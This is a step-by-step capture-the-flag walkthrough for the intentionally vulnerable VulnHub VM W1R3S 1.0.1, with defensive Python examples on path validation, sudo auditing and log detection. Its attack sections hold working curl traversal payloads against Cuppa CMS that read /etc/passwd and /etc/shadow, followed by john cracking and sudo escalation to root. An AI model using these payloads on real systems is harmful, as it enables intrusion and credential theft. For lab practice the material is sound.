[Vulnhub] Rooting VulnHub W1R3S: 1.0.1 — A Complete, Step-by-Step Walkthrough

This post is a clean, reproducible lab guide to compromise the vulnerable VM W1R3S: 1.0.1 end-to-end: discovery → enumeration → exploitation (LFI) → password cracking → SSH foothold → privilege escalation → proof. It’s written for beginners, but efficient enough for a speed-runner.

Table of Contents

  1. What you’ll learn
  2. Lab setup & prerequisites
  3. Network discovery
  4. Port scanning & service fingerprinting
  5. Looting FTP (anonymous)
  6. Web enumeration (finding hidden areas)
  7. Exploiting Cuppa CMS LFI to read files
  8. Extracting /etc/shadow & cracking a user
  9. SSH foothold with cracked creds
  10. Privilege escalation to root (sudo)
  11. Alternative paths & rabbit holes (WordPress)
  12. Troubleshooting & FAQ
  13. Speed-run checklist
  14. Ethics & safe practice
  15. Appendix: Handy one-liners

1) What You’ll Learn

  • A practical workflow for host discovery and service enumeration
  • How to mirror an FTP share and triage clue files quickly
  • How to identify and exploit a Local File Inclusion (LFI) in Cuppa CMS
  • How to retrieve /etc/passwd and /etc/shadow via LFI and crack hashes
  • How to verify sudoers and escalate privileges cleanly
  • What to ignore and why (avoiding rabbit holes speeds you up)

2) Lab Setup & Prerequisites

  • Attacker box: Kali Linux (or any Linux with nmap, curl, john, ffuf, wget)
  • Target: VulnHub VM W1R3S: 1.0.1 (bridged or NAT networking with DHCP)
  • Same L2 segment or appropriate routing so the attacker can reach the VM
  • Wordlists: rockyou.txt (commonly at /usr/share/wordlists/rockyou.txt)

⚠️ Legal note: Only attack machines you own or have explicit permission to test. This VM is purposefully vulnerable for training.

3) Network Discovery

Identify the target’s IP on your subnet.

# Option A: ARP sweep (quick on LANs)
sudo arp-scan -l

# Option B: netdiscover (passive/ARP)
sudo netdiscover -r 10.0.0.0/24

# Option C: ping sweep (ICMP may be filtered); prints only the hosts that answer
for i in {1..254}; do
  ping -c1 -W1 10.0.0.$i >/dev/null 2>&1 && echo "10.0.0.$i is up" &
done; wait

Assume we find the host at 10.0.0.42. I’ll use $IP as a placeholder:

export IP=10.0.0.42

4) Port Scanning & Service Fingerprinting

Start broad, then deep.

# Fast top-ports scan
nmap -T4 --top-ports 1000 -sV -oN nmap_top.txt $IP

# Full TCP sweep with scripts & version detection
sudo nmap -p- -sV -sC -O -oN nmap_full.txt $IP

Typical result (representative):

  • 21/tcp — FTP (vsftpd 3.0.3), anonymous login allowed
  • 22/tcp — SSH (OpenSSH 7.x)
  • 80/tcp — HTTP (Apache/2.4.x)
  • 3306/tcp — MySQL (host ACL restricts remote access)

5) Looting FTP (Anonymous)

If anonymous login is allowed, mirror everything for offline triage:

# Recursive mirror (active mode avoids some flaky NAT setups; drop --no-passive-ftp if transfers hang)
wget -m --no-passive-ftp ftp://anonymous:@$IP/
# Files will land under $IP/ in your current directory
tree $IP

What to look for:

  • Small text files under directories like content/, docs/, new-employees/
  • You may see base64 strings, MD5 digests, or employee names.
  • Treat them as breadcrumbs (usernames, small hints). Don’t overfit: they are not strictly required to root the box.

6) Web Enumeration (Finding Hidden Areas)

Run a wordlist dir-bust to discover interesting paths.

ffuf -u http://$IP/FUZZ -w /usr/share/dirb/wordlists/big.txt -ic -t 50 -o ffuf-root.json
ffuf -u http://$IP/administrator/FUZZ -w /usr/share/dirb/wordlists/common.txt -ic -t 50 -o ffuf-admin.json

Common findings:

  • /administrator → Cuppa CMS bits (installer/alerts)
  • /wordpress → a misconfigured WordPress (not needed for the intended path)

We’ll focus on Cuppa CMS because it exposes an LFI.


7) Exploiting Cuppa CMS LFI to Read Files

Cuppa’s alerting endpoint (/administrator/alerts) takes a urlConfig parameter and concatenates it into a file include path without validating it, so directory-traversal sequences in the value select arbitrary files on the server.

Test LFI to read /etc/passwd:

curl -s -X POST \
  -d "field=x&urlConfig=../../../../../../../../../../../../etc/passwd" \
  http://$IP/administrator/alerts | sed -n '1,80p'

If successful, you’ll see system users. This confirms a Local File Inclusion.

Tip: Some builds respond better to POST than GET for this endpoint. Keep the traversal long to be safe (it’s harmless to over-traverse).
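To see why the traversal above works and what the fix looks like, here is an added Python illustration of the bug class (Cuppa itself is PHP; this is not its code). The unsafe resolver mirrors the "join the request value onto the include directory" pattern; the hardened one checks an allowlist and then confirms the resolved path is still inside the include directory. INCLUDE_DIR, ALLOWED_INCLUDES and the function names are assumptions for the example.

```python
import os
from typing import Iterable, Optional

# Constructed for this walkthrough (assumptions, not Cuppa's real layout):
# a directory standing in for the CMS include folder, a hypothetical
# allowlist of include names, and the traversal value used in the curl
# command above.
INCLUDE_DIR = "/var/www/html/administrator/alerts"
ALLOWED_INCLUDES = {"alerts.php", "config.php"}
TRAVERSAL_PAYLOAD = "../../../../../../../../../../../../etc/passwd"


def vulnerable_include_path(base_dir: str, url_config: str) -> str:
    """The bug class: the request value is joined onto the include directory
    with no validation. '../' components walk out of base_dir, and an
    absolute value replaces base_dir entirely (os.path.join drops the
    first argument when the second is absolute)."""
    return os.path.normpath(os.path.join(base_dir, url_config))


def safe_include_path(base_dir: str, url_config: str,
                      allowed: Optional[Iterable[str]] = None) -> Optional[str]:
    """Hardened resolver with two independent checks:
      1. optional allowlist: the value must be one of the names the endpoint
         is meant to include (the strongest fix when the set is fixed);
      2. containment: after collapsing '..' and symlinks, the result must
         still lie inside base_dir.
    Returns None on failure so the caller can reject the request."""
    if allowed is not None and url_config not in set(allowed):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, url_config))
    if candidate == base:
        return None                      # empty or '.' value: nothing to include
    if os.path.commonpath([base, candidate]) != base:
        return None                      # traversal or absolute path: rejected
    return candidate


if __name__ == "__main__":
    print("unsafe :", vulnerable_include_path(INCLUDE_DIR, TRAVERSAL_PAYLOAD))
    print("safe   :", safe_include_path(INCLUDE_DIR, TRAVERSAL_PAYLOAD))
    print("legit  :", safe_include_path(INCLUDE_DIR, "alerts.php", ALLOWED_INCLUDES))
```

The containment check alone stops the traversal; the allowlist is what you want in a real fix, because an include endpoint rarely needs to accept a free-form path at all.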

8) Extracting /etc/shadow & Cracking a User

Now pull /etc/shadow through the same include. On a stock system the file is root:shadow 0640, so the web server process should not be able to read it; on this VM it can, which is a misconfiguration in its own right and what makes the next step possible.

curl -s -X POST \
  -d "field=x&urlConfig=../../../../../../../../../../../../etc/shadow" \
  http://$IP/administrator/alerts > shadow.txt

You should now have a file with entries like:

w1r3s:$6$SALT$HASH:...

Prepare for cracking with john:

# If needed, combine with /etc/passwd for matching users
curl -s -X POST \
  -d "field=x&urlConfig=../../../../../../../../../../../../etc/passwd" \
  http://$IP/administrator/alerts > passwd.txt

# (Optional) unshadow step if john complains; not always necessary
unshadow passwd.txt shadow.txt > unshadowed.txt

# Crack with rockyou (ensure it’s unzipped)
# Try both files; john handles either hash-only (shadow) or unshadowed format.
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
# or
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

# Show cracked credentials
john --show shadow.txt

Expected: You’ll recover a password for a local user (commonly the user w1r3s). Keep the username:password pair for SSH.

If cracking stalls: enable rules (--rules), try --fork=4, or run a short mask attack if you have a hunch about complexity. For this VM, a basic wordlist is enough.
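To make the shadow/passwd handling above concrete, here is an added Python helper (not part of the original post, and not john's code) that parses both files, reproduces what the unshadow step does, classifies each password field by hash algorithm, and lists which accounts actually have a crackable hash and a login shell. The sample lines are constructed; the hash bodies are placeholders, not digests from the VM.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample files in the layout of /etc/passwd and /etc/shadow.
# Salts and hash bodies are placeholders, not real values from the VM.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$6$SALTSALT$ROOTHASHPLACEHOLDER:17700:0:99999:7:::
daemon:*:17700:0:99999:7:::
www-data:*:17700:0:99999:7:::
w1r3s:$6$SALTSALT$USERHASHPLACEHOLDER:17700:0:99999:7:::
"""

# crypt(3) id prefix -> algorithm name; $6$ is the sha512crypt seen on this box
HASH_IDS = {"1": "md5crypt", "2b": "bcrypt", "5": "sha256crypt",
            "6": "sha512crypt", "y": "yescrypt"}
NOLOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")


def hash_status(hash_field: str) -> str:
    """Classify a shadow password field the way a reviewer triages it."""
    if hash_field == "":
        return "no-password"            # login succeeds with an empty password
    if hash_field == "*" or hash_field.startswith("!"):
        return "locked"                 # no valid hash, nothing for john to do
    m = re.match(r"^\$([^$]+)\$", hash_field)
    if m:
        return HASH_IDS.get(m.group(1), f"unknown-id-{m.group(1)}")
    return "des-or-unknown"             # legacy 13-char DES or something odd


@dataclass
class Account:
    name: str
    uid: int
    shell: str
    status: str

    @property
    def interactive(self) -> bool:
        return self.shell not in NOLOGIN_SHELLS


def parse_colon_file(text: str) -> List[List[str]]:
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def unshadow(passwd_text: str, shadow_text: str) -> List[str]:
    """What john's unshadow does: put the shadow hash into the second
    field of the matching passwd line."""
    hashes = {f[0]: f[1] for f in parse_colon_file(shadow_text)}
    merged = []
    for fields in parse_colon_file(passwd_text):
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def audit(passwd_text: str, shadow_text: str) -> List[Account]:
    hashes = {f[0]: f[1] for f in parse_colon_file(shadow_text)}
    return [Account(f[0], int(f[2]), f[6], hash_status(hashes.get(f[0], "*")))
            for f in parse_colon_file(passwd_text)]


def crackable(passwd_text: str, shadow_text: str) -> List[str]:
    """Accounts worth feeding to john: a real hash and a shell that logs in."""
    return [a.name for a in audit(passwd_text, shadow_text)
            if a.status in HASH_IDS.values() and a.interactive]


if __name__ == "__main__":
    for a in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{a.name:10} uid={a.uid:<5} {a.status:12} interactive={a.interactive}")
    print("crackable:", crackable(SAMPLE_PASSWD, SAMPLE_SHADOW))
```

Run against the passwd.txt and shadow.txt you dumped, this tells you in one pass which lines are worth john's time and why the "hash-only" and "unshadowed" inputs are equivalent: the hash is the same, only the surrounding fields differ.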

9) SSH Foothold with Cracked Creds

Log in via SSH using the cracked credentials:

ssh w1r3s@$IP
# password: <the one john recovered>

Post-login checks:

id
whoami
hostname
ls -la ~

10) Privilege Escalation to Root (sudo)

Always enumerate sudo first:

sudo -l

On this VM, you’ll typically see something equivalent to:

User w1r3s may run the following commands on <host>:
    (ALL : ALL) ALL

That means full sudo. Pop a root shell:

sudo -s
# or
sudo su -
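The `(ALL : ALL) ALL` line is the finding a reviewer would flag first in any sudo policy. As an added example (not from the original post), here is a Python parser for `sudo -l` output that records each rule's run-as user/group, tags and command, and reports the rules that matter: unrestricted commands, NOPASSWD, and run-as-anyone. The two policies in SAMPLE_SUDO_L are constructed; the first mirrors the output shown above, the second is an invented tighter policy for contrast.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed `sudo -l` output for two accounts. The first block mirrors the
# unrestricted rule shown in the walkthrough; the second is an invented,
# tighter policy used for contrast.
SAMPLE_SUDO_L = """\
User w1r3s may run the following commands on w1r3s:
    (ALL : ALL) ALL

User deploy may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (root) /usr/bin/systemctl status nginx
"""

HEADER_RE = re.compile(
    r"^User (?P<user>\S+) may run the following commands on (?P<host>\S+):")
# "(runas_user : runas_group) TAG: TAG: command" -- tags are optional
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


@dataclass
class Rule:
    user: str
    host: str
    runas_user: str
    runas_group: str
    tags: List[str]
    command: str

    @property
    def unrestricted(self) -> bool:
        return self.command == "ALL"          # any command at all

    @property
    def passwordless(self) -> bool:
        return "NOPASSWD" in self.tags        # no authentication step


def parse_sudo_l(text: str) -> List[Rule]:
    """Walk `sudo -l` output; 'Matching Defaults' lines match neither regex
    and are skipped. Rules are attributed to the most recent User header."""
    rules: List[Rule] = []
    user = host = None
    for line in text.splitlines():
        h = HEADER_RE.match(line)
        if h:
            user, host = h["user"], h["host"]
            continue
        r = RULE_RE.match(line)
        if r and user:
            parts = [p.strip() for p in r["runas"].split(":")]
            runas_user = parts[0] or "root"          # "()" means root
            runas_group = parts[1] if len(parts) > 1 else ""
            tags = [t.rstrip(":") for t in r["tags"].split()]
            rules.append(Rule(user, host, runas_user, runas_group, tags, r["cmd"]))
    return rules


def findings(text: str) -> List[Tuple[str, str]]:
    """(user, finding-code) pairs a reviewer would raise against the policy."""
    out: List[Tuple[str, str]] = []
    for r in parse_sudo_l(text):
        if r.unrestricted:
            out.append((r.user, "ALL-COMMANDS"))
        if r.passwordless:
            out.append((r.user, "NOPASSWD"))
        if r.runas_user == "ALL" and not r.unrestricted:
            out.append((r.user, "RUNAS-ANY-USER"))
    return out


if __name__ == "__main__":
    for user, code in findings(SAMPLE_SUDO_L):
        print(f"{user}: {code}")
```

On the stock VM the only output is `w1r3s: ALL-COMMANDS`, which is exactly why `sudo -s` works; the deploy policy shows what a least-privilege rule looks like by comparison (fixed binaries, explicit run-as user).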

Proof:

id
whoami    # root
cat /root/flag.txt

Done. 🎯


11) Alternative Paths & Rabbit Holes (WordPress)

You may find a WordPress at /wordpress, but it’s partially misconfigured (e.g., base URL pointing to localhost). You could try to:

  • Fix rendering with a Burp response rule or a local /etc/hosts alias to map the expected hostname to $IP
  • Run wpscan to enumerate users/plugins/themes
  • Attempt a template upload shell if you find creds

…but none of this is necessary for the intended solution. It’s a useful enumeration exercise only.


12) Troubleshooting & FAQ

Q: LFI against /administrator/alerts returns errors or blank pages.

  • Use POST with the exact parameter urlConfig=... and include a dummy field= key.
  • Try a longer traversal (many ../).
  • Verify the path: http://$IP/administrator/alerts (no trailing slash needed).
  • Confirm the webroot is reachable (curl -I http://$IP/).
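From the other side of the wire, the same LFI leaves a recognisable trail. As an added example (not part of the original post), here is Python detection logic that parses Apache combined-format access-log lines, percent-decodes the request target, and reports requests containing a traversal sequence together with any sensitive file they name. The log lines are constructed; addresses, timestamps and user agents are made up, and the query strings mirror the traversal shape used in this walkthrough.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed Apache "combined" access-log lines (addresses, timestamps and
# agents are made up). The query strings mirror the traversal shape used in
# the walkthrough, once plain and once percent-encoded.
SAMPLE_LOG = """\
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /administrator/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /administrator/alerts?field=x&urlConfig=../../../../../../etc/passwd HTTP/1.1" 200 2048 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /administrator/alerts?field=x&urlConfig=..%2f..%2f..%2fetc%2fshadow HTTP/1.1" 200 1800 "-" "curl/8.0"
10.0.0.15 - - [01/Jan/2024:10:01:00 +0000] "GET /wordpress/ HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:02:00 +0000] "POST /administrator/alerts HTTP/1.1" 200 2048 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so that
    single- and double-encoded '../' are both normalised before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def traversal_hits(log_text: str) -> List[Dict[str, str]]:
    """One record per request whose decoded target contains a traversal
    sequence, annotated with any sensitive file it names."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        decoded = fully_decode(rec["target"])
        if not TRAVERSAL_RE.search(decoded):
            continue
        named = [f for f in SENSITIVE_FILES if f in decoded]
        hits.append({
            "ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
            "status": rec["status"], "decoded": decoded,
            "sensitive": ",".join(named),
        })
    return hits


def posts_to(log_text: str, path: str = "/administrator/alerts") -> int:
    """Count POSTs to the endpoint. The access log does not record request
    bodies, so a POST-based LFI is invisible to traversal_hits(); this count
    is the signal to correlate with a source that logs bodies (e.g. a WAF
    audit log)."""
    return sum(1 for line in log_text.splitlines()
               if (rec := parse_line(line)) and rec["method"] == "POST"
               and rec["target"].split("?")[0] == path)


if __name__ == "__main__":
    for h in traversal_hits(SAMPLE_LOG):
        print(f"{h['ts']} {h['ip']} {h['method']} {h['status']} {h['sensitive'] or '-'} {h['decoded']}")
    print("POSTs to /administrator/alerts (body not logged):", posts_to(SAMPLE_LOG))
```

The decode step is the important one: matching `../` on the raw request line misses the percent-encoded variant entirely. The last sample line is the POST form used in this walkthrough, and it is deliberately not flagged, to make the point that request-body logging is needed to see it.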

Q: john doesn’t crack the hash.

  • Ensure you captured a full hash line (no HTML truncation).
  • Try unshadow passwd.txt shadow.txt > unshadowed.txt and crack unshadowed.txt.
  • Double-check rockyou.txt is present and unzipped (/usr/share/wordlists/rockyou.txt).
  • Add --rules or try a different wordlist (e.g., SecLists/Passwords/Common-Credentials).

Q: I can’t SSH (connection refused).

  • Verify port 22 is open with nmap -p22 $IP.
  • If using VirtualBox/VMware, re-check networking mode (bridged/NAT) and that the guest got an IP.
  • If NAT, ensure port forwarding or switch to bridged for simplicity.

Q: sudo -l asks for a password and then denies.

  • Make sure you’re running sudo -l as the cracked user.
  • If sudoers is not permissive in your run, enumerate standard Linux privesc paths (SUID binaries, writable cron, PATH hijack, kernel exploits). On the stock VM, sudo is the intended path.

13) Speed-Run Checklist

  1. Find IP: netdiscover -r X.X.X.0/24
  2. Scan: nmap -p- -sV -sC $IP
  3. Mirror FTP: wget -m --no-passive-ftp ftp://anonymous:@$IP/ (skim clues)
  4. Dirbust: ffuf -u http://$IP/FUZZ -w ... → see /administrator
  5. LFI: POST to /administrator/alerts → read /etc/passwd, /etc/shadow
  6. Crack: john --wordlist=rockyou.txt shadow.txt
  7. SSH: ssh user@$IP (use cracked pass)
  8. Root: sudo -l → sudo -s → cat /root/flag.txt

14) Ethics & Safe Practice

  • Use this VM for education only.
  • Don’t reuse cracked credentials on real systems.
  • Keep notes and command histories; reproducibility is a core skill in professional pentesting.

15) Appendix: Handy One-Liners

HTTP titles of discovered paths

while read p; do
  code=$(curl -s -o /dev/null -w "%{http_code}" http://$IP/$p)
  [ "$code" != "404" ] && printf "%-30s %s\n" "$p" "$code" && \
    curl -s http://$IP/$p | grep -i -m1 -E "<title>|<h1" | sed 's/<[^>]*>//g'
done < /usr/share/dirb/wordlists/common.txt

HTML-safe LFI dump (strip tags just in case)

curl -s -X POST \
  -d "field=x&urlConfig=../../../../../../../../../../../../etc/passwd" \
  http://$IP/administrator/alerts | sed 's/<[^>]*>//g'

John quick performance sanity check

john --test

Archive your run (evidence pack)

mkdir -p evidence && cp nmap_*.txt ffuf-*.json passwd.txt shadow.txt evidence/
tar -czf wires101_evidence.tgz evidence

Final Words

This VM is perfect for practicing the core rhythm of CTF-style pentesting: enumerate broadly, pick the shortest viable path, and keep your pipeline tidy (notes, captures, artifacts). Once you internalize this flow, you’ll move faster on tougher boxes.